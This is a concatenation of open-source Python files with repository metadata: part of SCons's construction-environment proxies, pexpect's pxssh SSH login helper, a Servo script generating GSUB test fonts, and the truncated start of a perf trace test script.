""" returns the list of all targets of the Install and InstallAs Builder.
"""
from SCons.Tool import install
if install._UNIQUE_INSTALLED_FILES is None:
install._UNIQUE_INSTALLED_FILES = SCons.Util.uniquer_hashables(install._INSTALLED_FILES)
return install._UNIQUE_INSTALLED_FILES
class OverrideEnvironment(Base):
"""A proxy that overrides variables in a wrapped construction
environment by returning values from an overrides dictionary in
preference to values from the underlying subject environment.
This is a lightweight (I hope) proxy that passes through most use of
attributes to the underlying Environment.Base class, but has just
enough additional methods defined to act like a real construction
environment with overridden values. It can wrap either a Base
construction environment, or another OverrideEnvironment, which
can in turn nest arbitrary OverrideEnvironments...
Note that we do *not* call the underlying base class
(SubsitutionEnvironment) initialization, because we get most of those
from proxying the attributes of the subject construction environment.
But because we subclass SubstitutionEnvironment, this class also
has inherited arg2nodes() and subst*() methods; those methods can't
be proxied because they need *this* object's methods to fetch the
values from the overrides dictionary.
"""
def __init__(self, subject, overrides={}):
if __debug__: logInstanceCreation(self, 'Environment.OverrideEnvironment')
self.__dict__['__subject'] = subject
self.__dict__['overrides'] = overrides
# Methods that make this class act like a proxy.
def __getattr__(self, name):
return getattr(self.__dict__['__subject'], name)
def __setattr__(self, name, value):
setattr(self.__dict__['__subject'], name, value)
# Methods that make this class act like a dictionary.
def __getitem__(self, key):
try:
return self.__dict__['overrides'][key]
except KeyError:
return self.__dict__['__subject'].__getitem__(key)
def __setitem__(self, key, value):
if not is_valid_construction_var(key):
raise SCons.Errors.UserError("Illegal construction variable `%s'" % key)
self.__dict__['overrides'][key] = value
def __delitem__(self, key):
try:
del self.__dict__['overrides'][key]
except KeyError:
deleted = 0
else:
deleted = 1
try:
result = self.__dict__['__subject'].__delitem__(key)
except KeyError:
if not deleted:
raise
result = None
return result
def get(self, key, default=None):
"""Emulates the get() method of dictionaries."""
try:
return self.__dict__['overrides'][key]
except KeyError:
return self.__dict__['__subject'].get(key, default)
def has_key(self, key):
try:
self.__dict__['overrides'][key]
return 1
except KeyError:
return key in self.__dict__['__subject']
def __contains__(self, key):
if self.__dict__['overrides'].__contains__(key):
return 1
return self.__dict__['__subject'].__contains__(key)
def Dictionary(self):
"""Emulates the items() method of dictionaries."""
d = self.__dict__['__subject'].Dictionary().copy()
d.update(self.__dict__['overrides'])
return d
def items(self):
"""Emulates the items() method of dictionaries."""
return list(self.Dictionary().items())
# Overridden private construction environment methods.
def _update(self, dict):
"""Update an environment's values directly, bypassing the normal
checks that occur when users try to set items.
"""
self.__dict__['overrides'].update(dict)
def gvars(self):
return self.__dict__['__subject'].gvars()
def lvars(self):
lvars = self.__dict__['__subject'].lvars()
lvars.update(self.__dict__['overrides'])
return lvars
# Overridden public construction environment methods.
def Replace(self, **kw):
kw = copy_non_reserved_keywords(kw)
self.__dict__['overrides'].update(semi_deepcopy(kw))
# The entry point that will be used by the external world
# to refer to a construction environment. This allows the wrapper
# interface to extend a construction environment for its own purposes
# by subclassing SCons.Environment.Base and then assigning the
# class to SCons.Environment.Environment.
Environment = Base
# An entry point for returning a proxy subclass instance that overrides
# the subst*() methods so they don't actually perform construction
# variable substitution. This is specifically intended to be the shim
# layer in between global function calls (which don't want construction
# variable substitution) and the DefaultEnvironment() (which would
# substitute variables if left to its own devices)."""
#
# We have to wrap this in a function that allows us to delay definition of
# the class until it's necessary, so that when it subclasses Environment
# it will pick up whatever Environment subclass the wrapper interface
# might have assigned to SCons.Environment.Environment.
def NoSubstitutionProxy(subject):
class _NoSubstitutionProxy(Environment):
def __init__(self, subject):
self.__dict__['__subject'] = subject
def __getattr__(self, name):
return getattr(self.__dict__['__subject'], name)
def __setattr__(self, name, value):
return setattr(self.__dict__['__subject'], name, value)
def raw_to_mode(self, dict):
try:
raw = dict['raw']
except KeyError:
pass
else:
del dict['raw']
dict['mode'] = raw
def subst(self, string, *args, **kwargs):
return string
def subst_kw(self, kw, *args, **kwargs):
return kw
def subst_list(self, string, *args, **kwargs):
nargs = (string, self,) + args
nkw = kwargs.copy()
nkw['gvars'] = {}
self.raw_to_mode(nkw)
return SCons.Subst.scons_subst_list(*nargs, **nkw)
def subst_target_source(self, string, *args, **kwargs):
nargs = (string, self,) + args
nkw = kwargs.copy()
nkw['gvars'] = {}
self.raw_to_mode(nkw)
return SCons.Subst.scons_subst(*nargs, **nkw)
return _NoSubstitutionProxy(subject)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mit
|
joymarquis/mscc
|
general/lib/python/pexpect-4.0.1/pexpect/pxssh.py
|
12
|
18725
|
'''This class extends pexpect.spawn to specialize setting up SSH connections.
This adds methods for login, logout, and expecting the shell prompt.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
from pexpect import ExceptionPexpect, TIMEOUT, EOF, spawn
import time
import os
__all__ = ['ExceptionPxssh', 'pxssh']
# Exception classes used by this module.
class ExceptionPxssh(ExceptionPexpect):
'''Raised for pxssh exceptions.
'''
class pxssh (spawn):
'''This class extends pexpect.spawn to specialize setting up SSH
connections. This adds methods for login, logout, and expecting the shell
prompt. It does various tricky things to handle many situations in the SSH
login process. For example, if the session is your first login, then pxssh
automatically accepts the remote certificate; or if you have public key
authentication setup then pxssh won't wait for the password prompt.
pxssh uses the shell prompt to synchronize output from the remote host. In
order to make this more robust it sets the shell prompt to something more
unique than just $ or #. This should work on most Borne/Bash or Csh style
shells.
Example that runs a few commands on a remote server and prints the result::
import pxssh
import getpass
try:
s = pxssh.pxssh()
hostname = raw_input('hostname: ')
username = raw_input('username: ')
password = getpass.getpass('password: ')
s.login(hostname, username, password)
s.sendline('uptime') # run a command
s.prompt() # match the prompt
print(s.before) # print everything before the prompt.
s.sendline('ls -l')
s.prompt()
print(s.before)
s.sendline('df')
s.prompt()
print(s.before)
s.logout()
except pxssh.ExceptionPxssh as e:
print("pxssh failed on login.")
print(e)
Example showing how to specify SSH options::
import pxssh
s = pxssh.pxssh(options={
"StrictHostKeyChecking": "no",
"UserKnownHostsFile": "/dev/null"})
...
Note that if you have ssh-agent running while doing development with pxssh
then this can lead to a lot of confusion. Many X display managers (xdm,
gdm, kdm, etc.) will automatically start a GUI agent. You may see a GUI
dialog box popup asking for a password during development. You should turn
off any key agents during testing. The 'force_password' attribute will turn
off public key authentication. This will only work if the remote SSH server
is configured to allow password logins. Example of using 'force_password'
attribute::
s = pxssh.pxssh()
s.force_password = True
hostname = raw_input('hostname: ')
username = raw_input('username: ')
password = getpass.getpass('password: ')
s.login (hostname, username, password)
'''
def __init__ (self, timeout=30, maxread=2000, searchwindowsize=None,
logfile=None, cwd=None, env=None, ignore_sighup=True, echo=True,
options={}, encoding=None, codec_errors='strict'):
spawn.__init__(self, None, timeout=timeout, maxread=maxread,
searchwindowsize=searchwindowsize, logfile=logfile,
cwd=cwd, env=env, ignore_sighup=ignore_sighup, echo=echo,
encoding=encoding, codec_errors=codec_errors)
self.name = '<pxssh>'
#SUBTLE HACK ALERT! Note that the command that SETS the prompt uses a
#slightly different string than the regular expression to match it. This
#is because when you set the prompt the command will echo back, but we
#don't want to match the echoed command. So if we make the set command
#slightly different than the regex we eliminate the problem. To make the
#set command different we add a backslash in front of $. The $ doesn't
#need to be escaped, but it doesn't hurt and serves to make the set
#prompt command different than the regex.
# used to match the command-line prompt
self.UNIQUE_PROMPT = "\[PEXPECT\][\$\#] "
self.PROMPT = self.UNIQUE_PROMPT
# used to set shell command-line prompt to UNIQUE_PROMPT.
self.PROMPT_SET_SH = "PS1='[PEXPECT]\$ '"
self.PROMPT_SET_CSH = "set prompt='[PEXPECT]\$ '"
self.SSH_OPTS = ("-o'RSAAuthentication=no'"
+ " -o 'PubkeyAuthentication=no'")
# Disabling host key checking, makes you vulnerable to MITM attacks.
# + " -o 'StrictHostKeyChecking=no'"
# + " -o 'UserKnownHostsFile /dev/null' ")
# Disabling X11 forwarding gets rid of the annoying SSH_ASKPASS from
# displaying a GUI password dialog. I have not figured out how to
# disable only SSH_ASKPASS without also disabling X11 forwarding.
# Unsetting SSH_ASKPASS on the remote side doesn't disable it! Annoying!
#self.SSH_OPTS = "-x -o'RSAAuthentication=no' -o 'PubkeyAuthentication=no'"
self.force_password = False
# User defined SSH options, eg,
# ssh.otions = dict(StrictHostKeyChecking="no",UserKnownHostsFile="/dev/null")
self.options = options
def levenshtein_distance(self, a, b):
'''This calculates the Levenshtein distance between a and b.
'''
n, m = len(a), len(b)
if n > m:
a,b = b,a
n,m = m,n
current = range(n+1)
for i in range(1,m+1):
previous, current = current, [i]+[0]*n
for j in range(1,n+1):
add, delete = previous[j]+1, current[j-1]+1
change = previous[j-1]
if a[j-1] != b[i-1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
def try_read_prompt(self, timeout_multiplier):
'''This facilitates using communication timeouts to perform
synchronization as quickly as possible, while supporting high latency
connections with a tunable worst case performance. Fast connections
should be read almost immediately. Worst case performance for this
method is timeout_multiplier * 3 seconds.
'''
# maximum time allowed to read the first response
first_char_timeout = timeout_multiplier * 0.5
# maximum time allowed between subsequent characters
inter_char_timeout = timeout_multiplier * 0.1
# maximum time for reading the entire prompt
total_timeout = timeout_multiplier * 3.0
prompt = self.string_type()
begin = time.time()
expired = 0.0
timeout = first_char_timeout
while expired < total_timeout:
try:
prompt += self.read_nonblocking(size=1, timeout=timeout)
expired = time.time() - begin # updated total time expired
timeout = inter_char_timeout
except TIMEOUT:
break
return prompt
def sync_original_prompt (self, sync_multiplier=1.0):
'''This attempts to find the prompt. Basically, press enter and record
the response; press enter again and record the response; if the two
responses are similar then assume we are at the original prompt.
This can be a slow function. Worst case with the default sync_multiplier
can take 12 seconds. Low latency connections are more likely to fail
with a low sync_multiplier. Best case sync time gets worse with a
high sync multiplier (500 ms with default). '''
# All of these timing pace values are magic.
# I came up with these based on what seemed reliable for
# connecting to a heavily loaded machine I have.
self.sendline()
time.sleep(0.1)
try:
# Clear the buffer before getting the prompt.
self.try_read_prompt(sync_multiplier)
except TIMEOUT:
pass
self.sendline()
x = self.try_read_prompt(sync_multiplier)
self.sendline()
a = self.try_read_prompt(sync_multiplier)
self.sendline()
b = self.try_read_prompt(sync_multiplier)
ld = self.levenshtein_distance(a,b)
len_a = len(a)
if len_a == 0:
return False
if float(ld)/len_a < 0.4:
return True
return False
### TODO: This is getting messy and I'm pretty sure this isn't perfect.
### TODO: I need to draw a flow chart for this.
def login (self, server, username, password='', terminal_type='ansi',
original_prompt=r"[#$]", login_timeout=10, port=None,
auto_prompt_reset=True, ssh_key=None, quiet=True,
sync_multiplier=1, check_local_ip=True):
'''This logs the user into the given server.
It uses
'original_prompt' to try to find the prompt right after login. When it
finds the prompt it immediately tries to reset the prompt to something
more easily matched. The default 'original_prompt' is very optimistic
and is easily fooled. It's more reliable to try to match the original
prompt as exactly as possible to prevent false matches by server
strings such as the "Message Of The Day". On many systems you can
disable the MOTD on the remote server by creating a zero-length file
called :file:`~/.hushlogin` on the remote server. If a prompt cannot be found
then this will not necessarily cause the login to fail. In the case of
a timeout when looking for the prompt we assume that the original
prompt was so weird that we could not match it, so we use a few tricks
to guess when we have reached the prompt. Then we hope for the best and
blindly try to reset the prompt to something more unique. If that fails
then login() raises an :class:`ExceptionPxssh` exception.
In some situations it is not possible or desirable to reset the
original prompt. In this case, pass ``auto_prompt_reset=False`` to
inhibit setting the prompt to the UNIQUE_PROMPT. Remember that pxssh
uses a unique prompt in the :meth:`prompt` method. If the original prompt is
not reset then this will disable the :meth:`prompt` method unless you
manually set the :attr:`PROMPT` attribute.
'''
ssh_options = ''.join([" -o '%s=%s'" % (o, v) for (o, v) in self.options.items()])
if quiet:
ssh_options = ssh_options + ' -q'
if not check_local_ip:
ssh_options = ssh_options + " -o'NoHostAuthenticationForLocalhost=yes'"
if self.force_password:
ssh_options = ssh_options + ' ' + self.SSH_OPTS
if port is not None:
ssh_options = ssh_options + ' -p %s'%(str(port))
if ssh_key is not None:
try:
os.path.isfile(ssh_key)
except:
raise ExceptionPxssh('private ssh key does not exist')
ssh_options = ssh_options + ' -i %s' % (ssh_key)
cmd = "ssh %s -l %s %s" % (ssh_options, username, server)
# This does not distinguish between a remote server 'password' prompt
# and a local ssh 'passphrase' prompt (for unlocking a private key).
spawn._spawn(self, cmd)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT, "(?i)connection closed by remote host"], timeout=login_timeout)
# First phase
if i==0:
# New certificate -- always accept it.
# This is what you get if SSH does not have the remote host's
# public key stored in the 'known_hosts' cache.
self.sendline("yes")
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
if i==2: # password or passphrase
self.sendline(password)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
if i==4:
self.sendline(terminal_type)
i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
# Second phase
if i==0:
# This is weird. This should not happen twice in a row.
self.close()
raise ExceptionPxssh('Weird error. Got "are you sure" prompt twice.')
elif i==1: # can occur if you have a public key pair set to authenticate.
### TODO: May NOT be OK if expect() got tricked and matched a false prompt.
pass
elif i==2: # password prompt again
# For incorrect passwords, some ssh servers will
# ask for the password again, others return 'denied' right away.
# If we get the password prompt again then this means
# we didn't get the password right the first time.
self.close()
raise ExceptionPxssh('password refused')
elif i==3: # permission denied -- password was bad.
self.close()
raise ExceptionPxssh('permission denied')
elif i==4: # terminal type again? WTF?
self.close()
raise ExceptionPxssh('Weird error. Got "terminal type" prompt twice.')
elif i==5: # Timeout
#This is tricky... I presume that we are at the command-line prompt.
#It may be that the shell prompt was so weird that we couldn't match
#it. Or it may be that we couldn't log in for some other reason. I
#can't be sure, but it's safe to guess that we did login because if
#I presume wrong and we are not logged in then this should be caught
#later when I try to set the shell prompt.
pass
elif i==6: # Connection closed by remote host
self.close()
raise ExceptionPxssh('connection closed')
else: # Unexpected
self.close()
raise ExceptionPxssh('unexpected login response')
if not self.sync_original_prompt(sync_multiplier):
self.close()
raise ExceptionPxssh('could not synchronize with original prompt')
# We appear to be in.
# set shell prompt to something unique.
if auto_prompt_reset:
if not self.set_unique_prompt():
self.close()
raise ExceptionPxssh('could not set shell prompt '
'(received: %r, expected: %r).' % (
self.before, self.PROMPT,))
return True
def logout (self):
'''Sends exit to the remote shell.
If there are stopped jobs then this automatically sends exit twice.
'''
self.sendline("exit")
index = self.expect([EOF, "(?i)there are stopped jobs"])
if index==1:
self.sendline("exit")
self.expect(EOF)
self.close()
def prompt(self, timeout=-1):
'''Match the next shell prompt.
This is little more than a short-cut to the :meth:`~pexpect.spawn.expect`
method. Note that if you called :meth:`login` with
``auto_prompt_reset=False``, then before calling :meth:`prompt` you must
set the :attr:`PROMPT` attribute to a regex that it will use for
matching the prompt.
Calling :meth:`prompt` will erase the contents of the :attr:`before`
attribute even if no prompt is ever matched. If timeout is not given or
it is set to -1 then self.timeout is used.
:return: True if the shell prompt was matched, False if the timeout was
reached.
'''
if timeout == -1:
timeout = self.timeout
i = self.expect([self.PROMPT, TIMEOUT], timeout=timeout)
if i==1:
return False
return True
def set_unique_prompt(self):
'''This sets the remote prompt to something more unique than ``#`` or ``$``.
This makes it easier for the :meth:`prompt` method to match the shell prompt
unambiguously. This method is called automatically by the :meth:`login`
method, but you may want to call it manually if you somehow reset the
shell prompt. For example, if you 'su' to a different user then you
will need to manually reset the prompt. This sends shell commands to
the remote host to set the prompt, so this assumes the remote host is
ready to receive commands.
Alternatively, you may use your own prompt pattern. In this case you
should call :meth:`login` with ``auto_prompt_reset=False``; then set the
:attr:`PROMPT` attribute to a regular expression. After that, the
:meth:`prompt` method will try to match your prompt pattern.
'''
self.sendline("unset PROMPT_COMMAND")
self.sendline(self.PROMPT_SET_SH) # sh-style
i = self.expect ([TIMEOUT, self.PROMPT], timeout=10)
if i == 0: # csh-style
self.sendline(self.PROMPT_SET_CSH)
i = self.expect([TIMEOUT, self.PROMPT], timeout=10)
if i == 0:
return False
return True
# vi:ts=4:sw=4:expandtab:ft=python:
|
gpl-3.0
|
huonw/servo
|
tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py
|
820
|
14309
|
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# parse
values = line.split("\t")
tag = values.pop(0)
mapping.append(tag);
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
charStringsIndex.append(charString)
glyphID = len(topDict.charset)
charStrings.charStrings[glyphName] = glyphID
topDict.charset.append(glyphName)
def makeLookup1():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
# bump this up so that the sequence is the same as the lookup 3 font
cp += 3
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 1
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = SingleSubst()
subtable.Format = 2
subtable.LookupType = 1
subtable.mapping = {
"%s.pass" % tag : "%s.fail" % tag,
"%s.fail" % tag : "%s.pass" % tag,
}
lookup.SubTable.append(subtable)
path = outputPath % 1 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeLookup3():
# make a variation of the shell TTX data
f = open(shellSourcePath)
ttxData = f.read()
f.close()
ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
tempShellSourcePath = shellSourcePath + ".temp"
f = open(tempShellSourcePath, "wb")
f.write(ttxData)
f.close()
# compile the shell
shell = TTFont(sfntVersion="OTTO")
shell.importXML(tempShellSourcePath)
shell.save(shellTempPath)
os.remove(tempShellSourcePath)
# load the shell
shell = TTFont(shellTempPath)
# grab the PASS and FAIL data
hmtx = shell["hmtx"]
glyphSet = shell.getGlyphSet()
failGlyph = glyphSet["F"]
failGlyph.decompile()
failGlyphProgram = list(failGlyph.program)
failGlyphMetrics = hmtx["F"]
passGlyph = glyphSet["P"]
passGlyph.decompile()
passGlyphProgram = list(passGlyph.program)
passGlyphMetrics = hmtx["P"]
# grab some tables
hmtx = shell["hmtx"]
cmap = shell["cmap"]
# start the glyph order
existingGlyphs = [".notdef", "space", "F", "P"]
glyphOrder = list(existingGlyphs)
# start the CFF
cff = shell["CFF "].cff
globalSubrs = cff.GlobalSubrs
topDict = cff.topDictIndex[0]
topDict.charset = existingGlyphs
private = topDict.Private
charStrings = topDict.CharStrings
charStringsIndex = charStrings.charStringsIndex
features = sorted(mapping)
# build the outline, hmtx and cmap data
cp = baseCodepoint
for index, tag in enumerate(features):
# tag.pass
glyphName = "%s.pass" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
# tag.fail
glyphName = "%s.fail" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
# tag.default
glyphName = "%s.default" % tag
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=passGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = passGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# tag.alt1,2,3
for i in range(1,4):
glyphName = "%s.alt%d" % (tag, i)
glyphOrder.append(glyphName)
addGlyphToCFF(
glyphName=glyphName,
program=failGlyphProgram,
private=private,
globalSubrs=globalSubrs,
charStringsIndex=charStringsIndex,
topDict=topDict,
charStrings=charStrings
)
hmtx[glyphName] = failGlyphMetrics
for table in cmap.tables:
if table.format == 4:
table.cmap[cp] = glyphName
else:
raise NotImplementedError, "Unsupported cmap table format: %d" % table.format
cp += 1
# set the glyph order
shell.setGlyphOrder(glyphOrder)
# start the GSUB
shell["GSUB"] = newTable("GSUB")
gsub = shell["GSUB"].table = GSUB()
gsub.Version = 1.0
# make a list of all the features we will make
featureCount = len(features)
# set up the script list
scriptList = gsub.ScriptList = ScriptList()
scriptList.ScriptCount = 1
scriptList.ScriptRecord = []
scriptRecord = ScriptRecord()
scriptList.ScriptRecord.append(scriptRecord)
scriptRecord.ScriptTag = "DFLT"
script = scriptRecord.Script = Script()
defaultLangSys = script.DefaultLangSys = DefaultLangSys()
defaultLangSys.FeatureCount = featureCount
defaultLangSys.FeatureIndex = range(defaultLangSys.FeatureCount)
defaultLangSys.ReqFeatureIndex = 65535
defaultLangSys.LookupOrder = None
script.LangSysCount = 0
script.LangSysRecord = []
# set up the feature list
featureList = gsub.FeatureList = FeatureList()
featureList.FeatureCount = featureCount
featureList.FeatureRecord = []
for index, tag in enumerate(features):
# feature record
featureRecord = FeatureRecord()
featureRecord.FeatureTag = tag
feature = featureRecord.Feature = Feature()
featureList.FeatureRecord.append(featureRecord)
# feature
feature.FeatureParams = None
feature.LookupCount = 1
feature.LookupListIndex = [index]
# write the lookups
lookupList = gsub.LookupList = LookupList()
lookupList.LookupCount = featureCount
lookupList.Lookup = []
for tag in features:
# lookup
lookup = Lookup()
lookup.LookupType = 3
lookup.LookupFlag = 0
lookup.SubTableCount = 1
lookup.SubTable = []
lookupList.Lookup.append(lookup)
# subtable
subtable = AlternateSubst()
subtable.Format = 1
subtable.LookupType = 3
subtable.alternates = {
"%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
"%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
"%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
}
lookup.SubTable.append(subtable)
path = outputPath % 3 + ".otf"
if os.path.exists(path):
os.remove(path)
shell.save(path)
# get rid of the shell
if os.path.exists(shellTempPath):
os.remove(shellTempPath)
def makeJavascriptData():
features = sorted(mapping)
outStr = []
outStr.append("")
outStr.append("/* This file is autogenerated by makegsubfonts.py */")
outStr.append("")
outStr.append("/* ")
outStr.append(" Features defined in gsubtest fonts with associated base")
outStr.append(" codepoints for each feature:")
outStr.append("")
outStr.append(" cp = codepoint for feature featX")
outStr.append("")
outStr.append(" cp default PASS")
outStr.append(" cp featX=1 FAIL")
outStr.append(" cp featX=2 FAIL")
outStr.append("")
outStr.append(" cp+1 default FAIL")
outStr.append(" cp+1 featX=1 PASS")
outStr.append(" cp+1 featX=2 FAIL")
outStr.append("")
outStr.append(" cp+2 default FAIL")
outStr.append(" cp+2 featX=1 FAIL")
outStr.append(" cp+2 featX=2 PASS")
outStr.append("")
outStr.append("*/")
outStr.append("")
outStr.append("var gFeatures = {");
cp = baseCodepoint
taglist = []
for tag in features:
taglist.append("\"%s\": 0x%x" % (tag, cp))
cp += 4
outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
outStr.append("};");
outStr.append("");
if os.path.exists(javascriptData):
os.remove(javascriptData)
f = open(javascriptData, "wb")
f.write("\n".join(outStr))
f.close()
# build fonts
print "Making lookup type 1 font..."
makeLookup1()
print "Making lookup type 3 font..."
makeLookup3()
# output javascript data
print "Making javascript data file..."
makeJavascriptData()
|
mpl-2.0
|
Zkin/pf-kernel-updates
|
tools/perf/scripts/python/check-perf-trace.py
|
1997
|
2539
|
# perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
